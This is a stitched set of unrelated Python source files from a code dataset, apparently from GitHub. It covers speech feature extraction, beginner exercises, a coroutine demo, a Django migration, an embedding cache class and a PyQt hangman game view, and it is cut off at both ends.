w_dic.items()]\n\tw_list = sorted(w_list,key=lambda tup:tup[1],reverse=True)\n\tw_list = [tup[0] for tup in w_list]\n\tw_list = w_list[0:vocab_size]\n\tw_list.append(\"unk\")\n\tw_dic = {}\n\tfor w in w_list:\n\t\tw_dic[w] = len(w_dic)+1\n\treturn w_dic\n\ndef append_pos_to_feature(feat_dir,pos_file,pos_dic,word_dic):\n\t##read pos tag\n\tdata_dic = {}\n\n\twith open(pos_file) as f:\n\t\tsents = f.readlines()\n\t\trow = 0\n\t\twhile row < len(sents):\n\t\t\tdata_name = sents[row].strip()\n\t\t\trow += 1\n\t\t\ttoken = sents[row].strip().split(\" \")\n\t\t\trow += 1\n\t\t\tpos = sents[row].strip().split(\" \")\n\t\t\trow += 1\n\t\t\trow += 1\n\t\t\ttoken.pop(-1)##remove punctuation\n\t\t\tpos.pop(-1)##remove punctuation\n\t\t\tpos_list = []\n\t\t\tassert len(token)==len(pos)\n\t\t\tfor i in range(len(token)):\n\t\t\t\tfor j in range(len(token[i].decode(\"utf-8\"))):\n\t\t\t\t\tone_word = token[i].decode(\"utf-8\")[j]\n\n\t\t\t\t\ttmp_feat = []\n\n\t\t\t\t\t##current pos\n\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i]]))\n\n\t\t\t\t\t##previous pos\n\t\t\t\t\tif i==0:\n\t\t\t\t\t\ttmp_feat.append(\"0\")\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i-1]]))\n\n\t\t\t\t\t##next pos\n\t\t\t\t\tif i==len(token)-1:\n\t\t\t\t\t\ttmp_feat.append(\"0\")\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i+1]]))\n\n\t\t\t\t\t##pos tag position in utterance\n\t\t\t\t\ttmp_feat.append(str(i))\n\n\t\t\t\t\t##word position in pos tag\n\t\t\t\t\ttmp_feat.append(str(j))\n\n\t\t\t\t\t##chinese character(word) index\n\t\t\t\t\tif one_word.encode(\"utf-8\") not in word_dic:\n\t\t\t\t\t\ttmp_feat.append(str(word_dic[\"unk\"]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(word_dic[one_word.encode(\"utf-8\")]))\n\n\t\t\t\t\tpos_list.append(tmp_feat)\n\t\t\t\t\t# pos_list.append([pos[i],i,j])##i=pos tag postion in utterance, j=word postion in its pos tag\n\t\t\tdata_dic[data_name] = pos_list\n\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [tmp_name for tmp_name in file_list if \"data\" in tmp_name]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor file_name in file_list:\n\t\tpos = data_dic[file_name.split(\".\")[0]]\n\t\tfile_sents = None\n\t\twith open(feat_dir+\"/\"+file_name) as f:\n\t\t\tfile_sents = f.readlines()\n\t\t# print(pos)\n\t\t# print(file_sents)\n\t\tassert len(file_sents)==len(pos),file_name\n\t\t# file_sents = [file_sents[i].strip()+\" \"+str(pos_dic[pos[i][0]])+\" \"+str(pos[i][1])+\" \"+str(pos[i][2])+\"\\n\" for i in range(len(file_sents))]\n\t\tfile_sents = [file_sents[i].strip()+\" \"+\" \".join(pos[i])+\"\\n\" for i in range(len(file_sents))]\n\t\twith open(feat_dir+\"/\"+file_name,\"w+\") as f:\n\t\t\tf.writelines(file_sents)\n\n\t# print(\"append 5 pos features: pos tag, pre pos tag, next pos tag, pos position in utterance, word position in pos\")\n\tprint(\"pos features \"+str(feature_before)+\" \"+str(feature_before+6-1))\n\treturn\n\n\ndef get_syl_dic(consonant_vowel_file):\n\tc_dic = {}\n\tv_dic = {}\n\twith open(consonant_vowel_file) as f:\n\t\tline = f.readline().strip().split(\" \")\n\t\tfor c in line:\n\t\t\tc_dic[c] = len(c_dic)\n\n\t\tline = f.readline().strip().split(\" \")\n\t\tfor v in line:\n\t\t\tv_dic[v] = len(v_dic)\n\treturn c_dic,v_dic\n\ndef decompose_zh_syl(syl_l,c_dic,v_dic):\n\tresult = []\n\tfor syl in syl_l:\n\t\tif syl in v_dic:\n\t\t\tresult.append([0,v_dic[syl]])\n\t\telse:\n\t\t\tp = 0\n\t\t\twhile syl[0:p+1] in c_dic:\n\t\t\t\tp += 1\n\t\t\t# print(syl[0:p]+\" \"+syl[p:])\n\t\t\tresult.append([c_dic[syl[0:p]],v_dic[syl[p:]]])\n\tresult = np.array(result).astype(np.int32)\n\treturn result\n\ndef append_syl_to_feature(feat_dir,txt_done_data,c_dic,v_dic):\n\tdata = {}\n\twith open(txt_done_data) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip().split(\" \")\n\t\t\tdata_name = line[1]\n\t\t\tsyl_list = line[3:-2]\n\t\t\tdata[data_name] = []\n\t\t\tfor syl in syl_list:\n\t\t\t\tdata[data_name].append(syl[0:-1])\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [file for file in file_list if \"data\" in file]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor data_name in file_list:\n\t\tif \"data\" not in data_name:\n\t\t\tcontinue\n\t\tsyl_l = data[data_name.split(\".\")[0]]\n\t\tcvl = decompose_zh_syl(syl_l,c_dic,v_dic)\n\t\tfeat_cont = None\n\t\twith open(feat_dir+\"/\"+data_name) as f:\n\t\t\tfeat_cont = f.readlines()\n\t\tfeat_cont = [line.strip() for line in feat_cont]\n\t\tassert len(feat_cont)==len(cvl)\n\t\twith open(feat_dir+\"/\"+data_name,\"w+\") as f:\n\t\t\tfor i in range(len(feat_cont)):\n\t\t\t\tfeat_cont[i] = feat_cont[i]+\" \"+str(cvl[i][0])+\" \"+str(cvl[i][1])+\"\\n\"\n\t\t\tf.writelines(feat_cont)\n\tprint(\"syllable features \"+str(feature_before)+\" \"+str(feature_before+2-1))\n\n\ndef append_phrase_to_feature(feat_dir,phrase_syl_dir):\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [file for file in file_list if \"data\" in file]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor file in file_list:\n\t\tif \"data\" not in file:\n\t\t\tcontinue\n\t\twith open(phrase_syl_dir+\"/\"+file.split(\".\")[0]) as f:\n\t\t\tutt = f.readlines()\n\t\t\tfor i in range(len(utt)):\n\t\t\t\tutt[i] = utt[i].strip().split(\" \")\n\n\t\t\tphrase_feat = []\n\t\t\tfor i in range(len(utt)):\n\t\t\t\tphrase = utt[i]\n\t\t\t\tfor j in range(len(phrase)):\n\t\t\t\t\tword_feat = []\n\t\t\t\t\t#phrase position in utt\n\t\t\t\t\tword_feat.append(i)\n\n\t\t\t\t\t#phrase percent in utt\n\t\t\t\t\tword_feat.append(float(i)/len(utt))\n\n\t\t\t\t\t#phrase number in utt\n\t\t\t\t\tword_feat.append(len(utt))\n\n\t\t\t\t\t#syllable position in phrase\n\t\t\t\t\tword_feat.append(j)\n\n\t\t\t\t\t#syllable percent in phrase\n\t\t\t\t\tword_feat.append(float(j)/len(phrase))\n\n\t\t\t\t\t#syllable number in phrase\n\t\t\t\t\tword_feat.append(len(phrase))\n\n\t\t\t\t\tphrase_feat.append(word_feat)\n\t\t\tphrase_feat = np.array(phrase_feat)\n\n\t\t\tori_feat = None\n\t\t\twith open(feat_dir+\"/\"+file) as featf:\n\t\t\t\tori_feat = featf.readlines()\n\t\t\t\tassert len(phrase_feat)==len(ori_feat),file+\": \"+str(len(phrase_feat))+\" doesn't equal to \"+str(len(ori_feat))\n\t\t\twith open(feat_dir+\"/\"+file,\"w+\") as outf:\n\t\t\t\tfor i in range(len(ori_feat)):\n\t\t\t\t\toutf.write(ori_feat[i].strip()+\" \"+\" \".join(phrase_feat[i].astype(np.str).tolist())+\"\\n\")\n\t# print(\"append 6 phrase features\")\n\tprint(\"phrase features \"+str(feature_before)+\" \"+str(feature_before+6-1))\n\ndef load_dic(file):\n\tdic = {}\n\twith open(file) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip().split(\" \")\n\t\t\tdic[line[0]] = int(line[1])\n\treturn dic\n\ndef save_dic(dic,out_file):\n\twith open(out_file,\"w+\") as f:\n\t\tfor key,idx in dic.items():\n\t\t\tf.write(str(key)+\" \"+str(idx)+\"\\n\")","repo_name":"WDongYuan/cantonese_f0_generation","sub_path":"seq_op/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"37902573188","text":"import sys\n#Write a Python program to test whether all numbers of a list is greater than a certain number. \nliss=[4,5,1,2,3,9]\nLa=8\ns=0\nfor i in liss:\n if liss[i]>La:\n s+=1\n if (s>0):\n print(\"not all numbers of list not greater than 8\")\n break;\n else:\n print(\"all numbers less than 8\")\n \n\n\n","repo_name":"sevilaybayatli/PYTHS19","sub_path":"Ex75.py","file_name":"Ex75.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"69851074536","text":"temperaturas = []\n\nfor i in range(1, 6):\n print(f\"Temperaturas del día {i}:\")\n tmax = float(input(\"Temperatura máxima: \"))\n tmin = float(input(\"Temperatura mínima: \"))\n temperaturas.append((tmax, tmin))\n\ntemperaturas_medias = []\nfor tmax, tmin in temperaturas:\n temperatura_media = (tmax + tmin) / 2\n temperaturas_medias.append(temperatura_media)\n\nfor i, temperatura_media in enumerate(temperaturas_medias):\n print(f\"La temperatura media del día {i+1} fue: {temperatura_media:.2f}\")\n\n\ntemperaturas_minimas = [tmin for _, tmin in temperaturas]\nminima_temperatura = min(temperaturas_minimas)\ndias_con_menos_temperatura = [i+1 for i, tmin in enumerate(temperaturas_minimas) if tmin == minima_temperatura]\nprint(f\"Los días con menos temperatura fueron: {dias_con_menos_temperatura}\")\n\ntemperatura_busqueda = float(input(\"Introduce una temperatura máxima a buscar: \"))\ndias_con_temperatura_busqueda = [i+1 for i, (tmax, _) in enumerate(temperaturas) if tmax == temperatura_busqueda]\nif dias_con_temperatura_busqueda:\n print(f\"Los días con temperatura máxima {temperatura_busqueda} fueron: {dias_con_temperatura_busqueda}\")\nelse:\n print(f\"No se encontraron días con temperatura máxima {temperatura_busqueda}.\")\n","repo_name":"patoflyer/python_proyect_one","sub_path":"ejercicios grisc15 y AithusaTm/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"15731367158","text":"\nimport asyncio\nfrom typing import Coroutine, Generator\nimport aioconsole\n\n\n# Generator - almost coroutine\ndef first() -> Generator:\n n = 0\n while True:\n yield n\n n += 1\n\n# First coroutine\ndef second() -> Generator:\n list_: list = []\n while True:\n n = (yield list_)\n list_.append(n)\n\n# Coroutine with asyncio\nasync def third() -> Coroutine:\n list_: list = []\n while True:\n n = (await aioconsole.ainput())\n await aioconsole.aprint(list_)\n list_.append(n)\n\n\nif __name__ == \"__main__\":\n \n # Launch generator\n gen: Generator = first()\n print(next(gen))\n print(next(gen))\n print(next(gen))\n\n print()\n\n # Launch coroutine\n cor: Generator = second()\n next(cor)\n print(cor.send(1))\n print(cor.send(2))\n print(cor.send(3))\n\n print()\n\n # Launch coroutine with asyncio\n asyncio.run(third())","repo_name":"UAcapitan/code","sub_path":"experiments/e10_coroutines.py","file_name":"e10_coroutines.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17594719550","text":"# encoding: utf-8\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n\n db.execute(\"CREATE EXTENSION IF NOT EXISTS intarray\")\n\n # Adding field 'CardFtsIndex.cmc'\n db.add_column('forge_cardftsindex', 'cmc', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)\n\n # Adding field 'CardFtsIndex.color_identity'\n db.add_column('forge_cardftsindex', 'color_identity', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)\n\n db.execute(\"ALTER TABLE forge_cardftsindex ADD COLUMN sets int[]\")\n db.execute(\"\"\"\n CREATE INDEX forge_cardftsindex_sets_idx\n ON forge_cardftsindex\n USING GIST (sets gist__int_ops)\n \"\"\")\n\n\n def backwards(self, orm):\n\n # Deleting field 'CardFtsIndex.cmc'\n db.delete_column('forge_cardftsindex', 'cmc')\n\n # Deleting field 'CardFtsIndex.color_identity'\n db.delete_column('forge_cardftsindex', 'color_identity')\n\n\n models = {\n 'forge.cardftsindex': {\n 'Meta': {'object_name': 'CardFtsIndex'},\n 'card': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'fts'\", 'to': \"orm['oracle.Card']\"}),\n 'cmc': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),\n 'color_identity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n 'oracle.card': {\n 'Meta': {'object_name': 'Card'},\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'name': ('contrib.fields.NullCharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})\n }\n }\n\n complete_apps = ['forge']\n","repo_name":"satyrius/mtgforge","sub_path":"backend/forge/migrations/0002_auto__add_field_cardftsindex_cmc__add_field_cardftsindex_color_identit.py","file_name":"0002_auto__add_field_cardftsindex_cmc__add_field_cardftsindex_color_identit.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24991662635","text":"import enum\nimport const\nimport os\nimport pickle\nimport datetime\nimport numpy as np\n\n\nclass EmbeddingSet:\n def __init__(self, model, languages=('C', 'Java', 'Python', 'SQL', 'Natrual', 'Other'), dump_seconds = 10):\n self.model = model\n self.cache_name = '{}_EmbeddingSet.pkl'.format(self.model.model_name)\n self.add_filename = 'QuestionAddFile.csv'\n self.delete_filename = 'QuestionDeleteFile.csv'\n\n if self.cache_name in os.listdir(const.CACHE_PATH):\n with open(os.path.join(const.CACHE_PATH, self.cache_name), 'rb') as f:\n self.data = pickle.load(f)\n for language in languages:\n if language not in self.data:\n self.data[language] = [[], []]\n else:\n self.data = dict([[language, [[], []]] for language in languages])\n self.data['prompts'] = dict()\n \n self.dump_seconds = dump_seconds\n self.last_dump_time = datetime.datetime.now()\n \n def dump(self):\n with open(os.path.join(const.CACHE_PATH, self.cache_name), 'wb') as f:\n pickle.dump(self.data, f)\n return dict([(language, len(self.data[language][0])) \\\n for language in self.data if language != 'prompts'])\n \n def add(self, language, qid, question):\n if language not in self.data:\n return False\n with open(os.path.join(const.CACHE_PATH, self.add_filename), 'a', encoding='utf8') as f:\n f.write('{},{},{}\\n'.format(language, qid, question))\n self.data[language][0].append(qid)\n self.data[language][1].append(self.model.embedding(question))\n self._update()\n return self.data[language][1][-1]\n\n \n def delete(self, qid):\n flag = False\n for language, records in self.data.items():\n if language == 'prompts':\n continue\n del_positions = list()\n for i, temp_qid in enumerate(records[0]):\n if qid == temp_qid:\n flag = True\n del_positions.append(i)\n for i, position in enumerate(del_positions):\n records[0].pop(position - i)\n records[1].pop(position - i)\n if flag:\n with open(os.path.join(const.CACHE_PATH, self.delete_filename), 'a', encoding='utf8') as f:\n f.write('{}\\n'.format(qid))\n self._update()\n return flag\n\n def checkqids(self, qids):\n to_be_checked = set(qids)\n for language, records in self.data.items():\n if language != 'prompts':\n for qid in records[0]:\n if len(to_be_checked) == 0:\n break\n if qid in to_be_checked:\n to_be_checked.remove(qid)\n return list(to_be_checked)\n\n\n def get_prompts_embedding(self, prompts):\n ret = False\n if len(prompts) == 0:\n return False\n for prompt in prompts:\n if prompt not in self.data['prompts']:\n self.data['prompts'][prompt] = self.model.embedding(prompt)\n if ret is False:\n ret = self.data['prompts'][prompt]\n else:\n ret = np.concatenate([ret, self.data['prompts'][prompt]], axis=0)\n self._update()\n return ret\n \n def get_languages_records(self, languages):\n ret = False\n for language in languages:\n if language == 'prompts' or language not in self.data:\n return False\n if ret == False:\n ret = [[], []]\n record = self.data[language]\n ret[0] += record[0]\n ret[1] += record[1]\n if not ret == False:\n ret[1] = np.concatenate(ret[1], axis=0)\n self._update()\n return ret\n\n def _update(self):\n present = datetime.datetime.now()\n if (present - self.last_dump_time).seconds > self.dump_seconds:\n self.dump()\n self.last_dump_time = present\n","repo_name":"8igfive/AIApe","sub_path":"BackEnd/SentenceEmbedding/EmbeddingSet.py","file_name":"EmbeddingSet.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"33139473506","text":"import sys\n\nfrom PyQt6 import QtGui, QtWidgets, QtCore\nfrom PyQt6 import uic\nfrom PyQt6.QtCore import (QPoint, QRect,\n QTimer, QUrl)\nfrom PyQt6.QtCore import QPointF, QRectF\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QPainter, QColor, QPen, QPolygon, QFont\nfrom PyQt6.QtMultimedia import QSoundEffect\n\nfrom Display.Button import Button\nfrom Display.ScoreView import ScoreView\nfrom Score import Score\n\nSOUND_FILE = \"sound/knife.wav\"\n\n\nclass TestWindow(QtWidgets.QMainWindow):\n\n def __init__(self, parent=None):\n super(TestWindow, self).__init__(parent)\n self.form_widget = HangmanView(progress=1, debug_anim=True)\n self.setCentralWidget(self.form_widget)\n self.setLayout(QtWidgets.QHBoxLayout())\n self.form_widget.showReplayButton(5)\n self.show()\n\n\nclass HangmanView(QtWidgets.QWidget):\n \"\"\"\n Hangman Drawing View that is responsible for drawing hangman animation with its progress animation.\n\n \"\"\"\n\n def __init__(self,\n max_attempts: int = 5,\n progress: float = 0,\n assets_dir: str = \"../assets\",\n reply_handler=lambda: print(\"Replay!!\"),\n home_handler=lambda: print(\"Home!!\"),\n debug_anim: bool = False):\n super(HangmanView, self).__init__()\n\n uic.loadUi(assets_dir + '/ui/hangmanView.ui', self)\n self.assets_dir: str = assets_dir\n \"\"\" Path to asset directory\"\"\"\n\n self.thicknessRatio: float = 0.05\n \"\"\" Thickness ration for the pen to the width\"\"\"\n self.thickness: int = 1\n \"\"\" Thickness of pen\"\"\"\n self.progress_percentage: float = progress\n \"\"\" Progress of the hangman drawing\"\"\"\n self.max_attempts: int = max_attempts\n \"\"\" Max attempts of the hangman\"\"\"\n self.attempts: int = self.max_attempts\n \"\"\" Remaining attempts\"\"\"\n self.debug_anim: bool = debug_anim\n \"\"\" Debug flag\"\"\"\n self.reply_handler = reply_handler\n \"\"\" Reply callback function for the reply button click\"\"\"\n self.home_handler = home_handler\n \"\"\" Home callback function for the home button click\"\"\"\n self.score_feed: list[Score] = []\n \"\"\" List of the score feed show in the left of the hangman view\"\"\"\n\n self.drawings = [\n self.drawBase,\n self.drawPoll,\n self.drawSupport,\n self.drawTop,\n self.drawHanger,\n self.drawHead,\n self.drawBody,\n self.drawLeftArm,\n self.drawRightArm,\n self.drawLeftLeg,\n self.drawRightLeg\n ]\n self.damageAnimValue: float = 0\n \"\"\" Animation progress integer used to keep track of the progress of the damage animation\"\"\"\n self.damageTimer: QTimer = QTimer()\n \"\"\" Damage animation timer used to create the damage animation\"\"\"\n self.overlay: float = 1\n \"\"\" Animation progress integer used to keep track of the progress of the overlay animation\"\"\"\n self.overlayTimer: QTimer = QTimer()\n \"\"\" Overlay animation timer used to create the overlay animation\"\"\"\n\n self.effect: QSoundEffect = None\n \"\"\" Sound effect played for the wrong guesses\"\"\"\n self.home_button: Button = None\n \"\"\" Home button \"\"\"\n self.reply_button: Button = None\n \"\"\" Reply button \"\"\"\n\n self.scoreView: ScoreView = None\n \"\"\" Score view that contains the feed of scores\"\"\"\n\n self.damageTimer.timeout.connect(lambda: self.damageAnim())\n self.overlayTimer.timeout.connect(lambda: self.overlayAnim())\n\n def setScoreView(self, scoreView: ScoreView) -> None:\n \"\"\"\n Setter for the Score View\n\n Parameters:\n scoreView (ScoreView): New scoreView\n\n Returns:\n None\n\n \"\"\"\n self.scoreView = scoreView\n\n def showReplayButton(self, duration: int = 5) -> None:\n \"\"\"\n Show reply button\n\n Parameters:\n duration (int): Duration of animation\n\n Returns:\n None\n\n \"\"\"\n self.overlayTimer.start(duration)\n\n def hideReplayButton(self) -> None:\n \"\"\"\n Hide reply button\n\n Returns:\n None\n\n \"\"\"\n self.overlayTimer.stop()\n self.setOverlay(1)\n\n def startDamageAnimation(self, duration: int = 5) -> None:\n \"\"\"\n Start damage animation\n\n Parameters:\n duration (int): Duration of animation\n\n Returns:\n None\n\n \"\"\"\n self.damageAnimValue = 1\n self.damageTimer.start(duration)\n\n def takeDamage(self) -> None:\n \"\"\"\n Take damage by progressing the hangman stage with sound and animation feedback\n\n Returns:\n None\n\n \"\"\"\n filename = self.assets_dir + \"/\" + SOUND_FILE\n self.effect = QSoundEffect()\n self.effect.setSource(QUrl.fromLocalFile(filename))\n self.effect.play()\n\n self.startDamageAnimation(5)\n\n if self.attempts <= 0:\n print(\"Hangman animation cannot got beyond\")\n return\n self.attempts = self.attempts - 1\n if self.attempts == 0:\n self.setStageProgress(1)\n else:\n self.setStageProgress((self.max_attempts - self.attempts) / self.max_attempts)\n\n def setReplayHandler(self, handler, append: bool = True) -> None:\n \"\"\"\n Update replay button handler\n\n Parameters:\n handler (callable): New handler\n append (bool): True if appending the new handler to the existing handler\n\n Returns:\n None\n\n \"\"\"\n func = self.reply_handler\n if self.reply_handler is not None and append:\n self.reply_handler = lambda: [func(), handler()]\n else:\n self.reply_handler = lambda: handler()\n\n def setHomeHandler(self, handler, append: bool = True) -> None:\n \"\"\"\n Update home button handler\n\n Parameters:\n handler (callable): New handler\n append (bool): True if appending the new handler to the existing handler\n\n Returns:\n None\n\n \"\"\"\n func = self.home_handler\n if self.home_handler is not None and append:\n self.home_handler = lambda: [func(), handler()]\n else:\n self.home_handler = lambda: handler()\n\n def setStageProgress(self, progress_percentage: float) -> None:\n \"\"\"\n set progress_percentage to the new value\n\n Parameters:\n progress_percentage (int): New progress_percentage value\n\n Returns:\n None\n\n \"\"\"\n self.progress_percentage = progress_percentage\n\n def setMaxAttempts(self, max_attempts: int) -> None:\n \"\"\"\n Setter for the max_attempts\n\n Parameters:\n max_attempts (str): New max_attempts\n\n Returns:\n None\n\n \"\"\"\n self.max_attempts = max_attempts\n self.attempts = max_attempts\n\n def reset(self) -> None:\n \"\"\"\n Resets the hangman view\n\n Returns:\n None\n\n \"\"\"\n self.attempts = self.max_attempts\n self.setOverlay(0)\n self.damageAnimValue = 0\n self.setStageProgress(0)\n self.repaint()\n self.damageTimer.stop()\n self.overlayTimer.stop()\n # self.showReplayButton(5)\n\n def setOverlay(self, overlay: float) -> None:\n \"\"\"\n Setter for the overlay\n\n Parameters:\n overlay (float): New overlay value\n\n Returns:\n None\n\n \"\"\"\n if 0 < overlay < 1:\n self.overlay = overlay\n elif overlay < 0:\n self.overlay = 0\n else:\n self.overlay = 1\n\n self.home_button.setOpacity(int(255 * ((1 - self.overlay) * 2)))\n self.reply_button.setOpacity(int(255 * ((1 - self.overlay) * 2)))\n\n def overlayAnim(self) -> None:\n \"\"\"\n Overlay animation callback\n\n Returns:\n None\n\n \"\"\"\n if self.overlay < 0.5:\n self.overlayTimer.stop()\n else:\n self.setOverlay(self.overlay - 0.01)\n self.repaint()\n\n def damageAnim(self) -> None:\n \"\"\"\n Overlay animation callback\n\n Returns:\n None\n\n \"\"\"\n if self.damageAnimValue <= 0:\n self.damageAnimValue = 1\n self.damageAnimValue -= 0.05\n if self.damageAnimValue < 0:\n self.damageTimer.stop()\n else:\n self.repaint()\n\n def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:\n regionRect: QRectF = self.getHangmanRect()\n rect = regionRect.toRect()\n self.home_button = Button(rect.left(), rect.top() + int(0.7 * rect.height()), rect.width(), rect.height(), 0.8,\n 0.2,\n bg_color=QColor(66, 205, 82))\n\n self.reply_button = Button(rect.left(), rect.top() + int(0.3 * rect.height()), rect.width(), rect.height(), 0.8,\n 0.2,\n bg_color=QColor(66, 205, 82))\n self.setOverlay(self.overlay)\n\n def mouseReleaseEvent(self, event: QtGui.QMouseEvent) -> None:\n if self.debug_anim:\n self.takeDamage()\n self.attempts = self.max_attempts\n self.progress_percentage = 1\n\n # Reply\n self.reply_button.eventHandle(event, self.reply_handler)\n\n # Home button\n self.home_button.eventHandle(event, self.home_handler)\n\n def paintEvent(self, e) -> None:\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.setRenderHint(QPainter.RenderHint.Antialiasing)\n regionRect: QRectF = self.getHangmanRect()\n\n if self.scoreView is not None:\n self.drawScoreFeed(qp, regionRect)\n self.thickness = int(self.thicknessRatio * regionRect.width())\n\n qp.setBrush(QColor(29, 27, 24))\n # qp.setBrush(QColor(int(29 * self.value), int(27 * self.value), int(24 * self.value)))\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n qp.setPen(pen)\n\n rect = regionRect.toRect()\n qp.drawRect(rect)\n\n for i in range(len(self.drawings)):\n if self.progress_percentage <= i / len(self.drawings):\n break\n if i == (len(self.drawings) - 1) and self.progress_percentage != 1:\n break\n\n color = QColor(\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay),\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay),\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay)\n ) if i < 5 else QColor(\n int(255 * self.overlay),\n int((255 - int(255 * self.damageAnimValue)) * self.overlay),\n int((255 - int(255 * self.damageAnimValue)) * self.overlay))\n\n self.drawings[i](qp, color, rect.left(), rect.top(), rect.width(), rect.height())\n # self.overlay = 0.5\n\n if self.reply_button.isActive():\n self.drawReplayButton(qp, self.reply_button)\n if self.home_button.isActive():\n self.drawHomeButton(qp, self.home_button)\n\n qp.end()\n\n def getHangmanRect(self) -> QRectF:\n \"\"\"\n Getter for the hangman box rectangle.\n\n Returns:\n QRectF: Area of the hangman drawing will take\n\n \"\"\"\n width = self.width()\n height = self.height()\n width_ratio = 2\n height_ratio = 3\n width32 = None\n height32 = None\n top = None\n left = None\n if width * height_ratio / width_ratio < height:\n width32 = width\n height32 = width * height_ratio / width_ratio\n top = (height - height32) / 2\n left = 0\n\n else:\n height32 = height\n width32 = height32 * width_ratio / height_ratio\n top = 0\n left = (width - width32) / 2\n\n rect = QRectF(left, top, width32, height32)\n return rect\n\n def getScoreFeedRect(self, hangmanRect: QRectF) -> QRectF:\n \"\"\"\n Getter for the hangman box rectangle.\n\n Parameters:\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n QRectF: Area of the score feed rectangle will take\n\n \"\"\"\n width: int = self.width()\n leftSpacingWidth = int((width - hangmanRect.width()) / 2)\n\n return QRectF(self.width() // 2 + int(hangmanRect.width() / 2), 0, leftSpacingWidth, self.height())\n\n def drawScoreFeed(self, painter: QPainter, hangmanRect: QRectF) -> None:\n \"\"\"\n Draw Score feed\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(QColor(255, 27, 24))\n socreFeedRect = self.getScoreFeedRect(hangmanRect)\n\n score_feed = self.scoreView.getFeed()\n for i in range(0, len(score_feed)):\n score = score_feed[i]\n button = Button(socreFeedRect.left(),\n socreFeedRect.top() + (i + 1) * socreFeedRect.height() * 0.12,\n socreFeedRect.width(),\n socreFeedRect.height(), 0.5, 0.1,\n text=str(score), fg_color=QColor(255, 255, 255, 255),\n bg_color=score.getBGColor(255),\n border_color=score.getPen(255).color()\n )\n button.setOpacity(int(255 * (5 - i) / 5))\n button.drawButton(painter)\n\n def drawHomeButton(self, painter: QPainter, button: Button) -> None:\n \"\"\"\n Draw home button\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n\n center = button.rect.center()\n\n length = button.getLength()\n button.drawButton(painter)\n\n color_icon = QColor(255, 255, 255, int(255 * ((1 - self.overlay) * 2)))\n pen = QPen(color_icon)\n\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n painter.setPen(pen)\n\n size_icon: QPointF = QPointF(length, length) / 24 * 9\n\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n painter.setPen(pen)\n painter.setBrush(color_icon)\n size_triangle = size_icon\n triangle = QPolygon([\n QPointF(center.x() - size_triangle.x(), center.y() + size_triangle.y() * 1 / 2).toPoint(),\n QPointF(center.x(), center.y() - size_triangle.y() * 1 / 3).toPoint(),\n QPointF(center.x() + size_triangle.x(), center.y() + size_triangle.y() * 1 / 2).toPoint()]\n ).translated(0, - (size_icon.toPoint() / 3 * 2).y())\n painter.drawPolygon(triangle, Qt.FillRule.WindingFill)\n\n rect = QRect(\n (center - size_icon / 2).toPoint(),\n (center + size_icon / 2).toPoint()\n ).translated(0, (size_icon / 4).toPoint().y())\n painter.drawRect(rect)\n\n def drawReplayButton(self, painter: QPainter, button: Button) -> None:\n \"\"\"\n Draw replay button\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n # painter.setPen(pen)\n\n center = 